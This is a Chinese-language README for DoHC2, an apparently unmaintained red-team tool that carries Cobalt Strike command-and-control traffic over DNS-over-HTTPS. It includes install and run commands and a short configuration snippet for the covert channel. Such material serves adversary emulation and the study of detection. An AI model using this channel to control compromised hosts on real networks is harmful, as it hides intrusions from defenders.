⚠️ 注意:此工具不再处于积极维护状态。
DoHC2 允许通过 HTTPS 上的 DNS (DoH) 利用 Ryan Hanson 的 ExternalC2 库 (https://github.com/ryhanson/ExternalC2) 进行命令与控制 (C2)。该项目专为流行的对抗模拟与红队操作软件 Cobalt Strike (https://www.cobaltstrike.com) 而构建。
该项目于 2018 年 10 月 23 日在 Mitre ATT&CKcon 上发布。
幻灯片: 用 ATT&CK 与安全举措唱反调
博客文章: DOH!DNS Over HTTPS 可能给企业带来风险

基于 ACME DNS Server 的 Python DNS 服务器
pip3 install -r requirements.txt
sudo python3 ./DoHC2.py
在 @ryhanson 的 ExternalC2 基础上增加了以下内容:
DoHC2 doh = new DoHC2();
doh.Configure("<INPUTDOMAIN>","<OUTPUTDOMAIN>","<DoH URI i.e. https://dns.google.com/resolve or https://dns.example.org/dns-query");
doh.Go();
DoHC2
某些元素由 David Middlehurst、SpiderLabs 创建,如上所述(在使用其他开源项目时,请参阅各自的许可证)。
版权所有 (C) 2018 Trustwave Holdings, Inc.
本程序是自由软件:你可以根据自由软件基金会发布的 GNU 通用公共许可证的条款(许可证的第 3 版或(由你选择的)任何后续版本)重新分发和/或修改它。
分发本程序是希望它会有用,但不提供任何保证;甚至没有适销性或特定用途适用性的隐含保证。有关更多详情,请参阅 GNU 通用公共许可证。